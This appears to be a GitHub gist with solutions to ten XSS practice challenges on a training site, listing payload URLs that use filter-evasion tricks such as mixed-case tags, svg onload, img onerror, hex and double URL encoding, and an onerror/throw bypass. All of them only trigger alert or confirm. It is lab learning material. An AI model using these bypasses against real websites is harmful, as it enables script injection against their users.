-
-
Save hunter0x8/57ce87d29e88aa81bb10c86230c31d79 to your computer and use it in GitHub Desktop.
Revisions
-
cb-v4s renamed this gist
Dec 31, 2020 . 1 changed file with 0 additions and 0 deletions.There are no files selected for viewing
File renamed without changes. -
Dec 28, 2020 . 1 changed file with 1 addition and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -1,4 +1,4 @@ XSS Challenges from zixem.altervista.org ======================================== Level 1 -
Dec 28, 2020 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,79 @@ XXS Challenges from zixem.altervista.org ======================================== Level 1 ------- `http://www.zixem.altervista.org/XSS/1.php?name=<script>alert(1337)</script>` Level 2 ------- `http://www.zixem.altervista.org/XSS/2.php?name=<ScRIpt>alert(1337)</SCript>` Level 3 ------- Escaping %0A (\n) `http://zixem.altervista.org/XSS/3.php?name=%0a<svg/onload="alert(1337)">` Level 4 ------- ``` <img src='htp.pngd'onerror=alert(1337) ' /> ``` `http://zixem.altervista.org/XSS/4.php?img=htp.pngd'onerror=alert(1337)%20` Level 5 ------- ``` <form action="javascript:alert(1337)" method='get'> ``` `http://zixem.altervista.org/XSS/5.php?name=x&action=javascript:alert(1337)` Level 6 ------- Hex Encoding ```node new Buffer.from('<').toString('hex') ``` `http://zixem.altervista.org/XSS/6.php?name=zxm\x3csvg/onload=alert(1337)\x3e` Level 7 ------- Double URL Encoding (<>) ```node encodeURIComponent(encodeURIComponent('<>')) ``` `http://zixem.altervista.org/XSS/7.php?name=zxm%253csvg/onload=alert(1337)%253e` Level 8 ------- `` Level 9 ------- `http://zixem.altervista.org/XSS/9.php?name=zxm<SVg/onload=confirm(1337)>` Level 10 -------- Filtered `(` * `http://zixem.altervista.org/XSS/10.php?name=zxm');onerror=alert;throw 1337;//` * http://zixem.altervista.org/XSS/10.php?name=zxm');onerror=confirm`1337`;//